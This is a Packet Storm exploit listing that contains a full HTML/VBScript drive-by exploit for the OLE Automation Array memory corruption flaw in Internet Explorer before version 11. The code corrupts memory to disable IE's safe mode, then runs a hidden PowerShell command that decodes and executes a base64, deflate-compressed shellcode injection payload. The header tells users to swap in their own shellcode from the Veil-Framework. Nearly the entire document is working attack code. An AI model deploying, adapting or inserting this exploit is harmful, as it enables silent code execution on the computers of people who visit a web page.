Microsoft Internet Explorer OLE Pre-IE11 Code Execution

2014-11-21T00:00:00
ID PACKETSTORM:129210
Type packetstorm
Reporter b33f
Modified 2014-11-21T00:00:00

Description

                                        
                                            `<!doctype html>  
<html>  
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >  
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />  
<body>  
  
<pre>  
|--------------------------------------------------------------------------|  
| Title: OLE Automation Array Remote Code Execution => Pre IE11 |  
| Original Exploit: yuange - http://www.exploit-db.com/exploits/35229/ |  
| Rework: GradiusX (francescomifsud@gmail.com ) & b33f (@FuzzySec) |  
| Shellcode: Use the Veil-Framework, powershell/shellcode_inject/virtual |  
| Usage: http://www.fuzzysecurity.com/exploits/21.html |  
|--------------------------------------------------------------------------|  
Very nice black-magic yuange, don't think it went unnoticed that you   
have been popping shells since 2009 :D 人无千日好,花无百日红   
|--------------------------------------------------------------------------|  
</pre>  
  
<SCRIPT LANGUAGE="VBScript">  
function runmumaa()  
On Error Resume Next  
set shell=createobject("Shell.Application")  
  
'powershell/shellcode_inject/virtual --> windows/messagebox title='Ooops!' text='Powershell FTW!'  
payload="nVVdi9tGFH33rxiMHmzWWkYafTlmIWlDIVBCYZf2wfhhNBp1RWXJyHLqTZv/Xp1jXzfbvIS+zOed+3HOuVLg1IN6O59t37fth/2hH8bF/A8/dL418X3VtvPlTh1OZds4dRztOE3+PE736kM3/jIO6tdmGE+2fde2vVtcz/5cqVPTjep8nV+u8+fl5n/H+XHwdvRPz9NUSZzT1e+nlfo38nX1VezryX+j74+f3DB+T+y93x/9uPjW862q+dtZ0E9Avquq8Onl4FU4vSn98N7XTdeMTd+pwKnwo917Nf+t6Uw8V2E37Y4H67ziyU+nzsHyqMKDPR7H5+E0C84PQf/mzSuQ9UqfI60xmcuU6OVGbX94Gf12twuOYFSfSzvdlH4a0nIaqnoadIIVLlyF1XoacpzFGGoMKS5MBBPcllglsZylKYJjq82rbYFtjkApAhl4qfkC0YpSVjHs4mIaMgwWMTy8aHhxGOIMDnKY4FmSSwZJJsUweIwzywwAQoZVBWODojOcFTDJnJwlWEUImaDUAsYOrjTfOkGIzwxWDsVERA0mKbOiSSaQlE5KveCSSvYpb1lbJdmXpAu5WJpoiaFRVpRL4uQjIUwstbxFY/kwsYDTYlsjhkdZa+bCisj+WgAzRnJ2GGwsbGVWmPYwyZBLgUA1TNbEvhQCclwUMI5g5wrRCzN1pTAdZVJvokV6eSyuCCLR1dRfLtjTAcVAOC0c+FpqIy4+kVwuNFqhlgjVTgjInZCca8GgYBp4VuFF4UQ5OR0QXSNxHTmHcU2VYIi8SI89UxIrbD1u4/WtNmoSkBhkmhYiM4vBpcJ5iQvKu85EFvRiE8mAqbFXSRnB1kic3UN0CbZln99WFu7ZW449SEKtaCjLhWn2L+kmRwwUkW6qCTGo3UKLQBLYsY+ocSJOV57y5rckFm1UbNhYZMZ+uxBAV6mwcOkPwnnrvALD2kjlbGIWQyFlN6kwe4LNXiCDrJJvK0rUCKamlEDUGnEhySlQ44cxgtOMRaeSqXUiH34izVoqj9zqa53WVJi5VamFClYZ10xoM6v7QS2C5kFvgkaFrZ82R3f/s+9+H5/DaDmd3t0t1V/48F//PNvLr2e3CM73T/20MfFieRc0y5Wanm6DZrdS0VL9rfrTGHantt18mQWf+et49d+cEloF5xUm/DIeRzuM4WPr/UGFj971XaXwZ9H6Hw=="  
  
command="Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(""""" & chr(34) & payload & chr(34) & """"")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"  
  
params="-NoP -NonI -Exec Bypass -Command " & command  
  
'Original POC yuange  
'set shell=createobject("Shell.Application")  
'shell.ShellExecute "notepad.exe"  
  
'With UAC  
'shell.ShellExecute "powershell", params, "", "runas", 0  
  
'Without UAC  
shell.ShellExecute "powershell", params, "", "", 0  
  
end function  
</script>  
  
<SCRIPT LANGUAGE="VBScript">  
  
dim aa()  
dim ab()  
dim a0  
dim a1  
dim a2  
dim a3  
dim win9x  
dim intVersion  
dim rnda  
dim funclass  
dim myarray  
  
Begin()  
  
function Begin()  
On Error Resume Next  
info=Navigator.UserAgent  
  
if(instr(info,"Win64")>0) then  
exit function  
end if  
  
if (instr(info,"MSIE")>0) then  
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
else  
exit function   
  
end if  
  
win9x=0  
  
BeginInit()  
If Create()=True Then  
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)  
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)  
  
if(intVersion<4) then  
document.write("<br> IE")  
document.write(intVersion)  
runshellcode()   
else   
setnotsafemode()  
end if  
end if  
end function  
  
function BeginInit()  
Randomize()  
redim aa(5)  
redim ab(5)  
a0=13+17*rnd(6)  
a3=7+3*rnd(5)  
end function  
  
function Create()  
On Error Resume Next  
dim i  
Create=False  
For i = 0 To 400  
If Over()=True Then  
' document.write(i)   
Create=True  
Exit For  
End If  
Next  
end function  
  
sub testaa()  
end sub  
  
function mydata()  
On Error Resume Next  
i=testaa  
i=null  
redim Preserve aa(a2)   
  
ab(0)=0  
aa(a1)=i  
ab(0)=6.36598737437801E-314  
  
aa(a1+2)=myarray  
ab(2)=1.74088534731324E-310   
mydata=aa(a1)  
redim Preserve aa(a0)   
end function  
  
  
function setnotsafemode()  
On Error Resume Next  
i=mydata()   
i=readmemo(i+8)  
i=readmemo(i+16)  
j=readmemo(i+&h134)   
for k=0 to &h60 step 4  
j=readmemo(i+&h120+k)  
if(j=14) then  
j=0   
redim Preserve aa(a2)   
aa(a1+2)(i+&h11c+k)=ab(4)  
redim Preserve aa(a0)   
  
j=0  
j=readmemo(i+&h120+k)   
  
Exit for  
end if  
  
next  
ab(2)=1.69759663316747E-313  
runmumaa()  
end function  
  
function Over()  
On Error Resume Next  
dim type1,type2,type3  
Over=False  
a0=a0+a3  
a1=a0+2  
a2=a0+&h8000000  
  
redim Preserve aa(a0)  
redim ab(a0)   
  
redim Preserve aa(a2)  
  
type1=1  
ab(0)=1.123456789012345678901234567890  
aa(a0)=10  
  
If(IsObject(aa(a1-1)) = False) Then  
if(intVersion<4) then  
mem=cint(a0+1)*16   
j=vartype(aa(a1-1))  
if((j=mem+4) or (j*8=mem+8)) then  
if(vartype(aa(a1-1))<>0) Then   
If(IsObject(aa(a1)) = False ) Then   
type1=VarType(aa(a1))  
end if   
end if  
else  
redim Preserve aa(a0)  
exit function  
  
end if  
else  
if(vartype(aa(a1-1))<>0) Then   
If(IsObject(aa(a1)) = False ) Then  
type1=VarType(aa(a1))  
end if   
end if  
end if  
end if  
  
  
If(type1=&h2f66) Then   
Over=True   
End If   
If(type1=&hB9AD) Then  
Over=True  
win9x=1  
End If   
  
redim Preserve aa(a0)   
  
end function  
  
function ReadMemo(add)  
On Error Resume Next  
redim Preserve aa(a2)   
  
ab(0)=0   
aa(a1)=add+4   
ab(0)=1.69759663316747E-313   
ReadMemo=lenb(aa(a1))   
  
ab(0)=0   
  
redim Preserve aa(a0)  
end function  
  
</script>  
  
</body>  
</html>  
  
`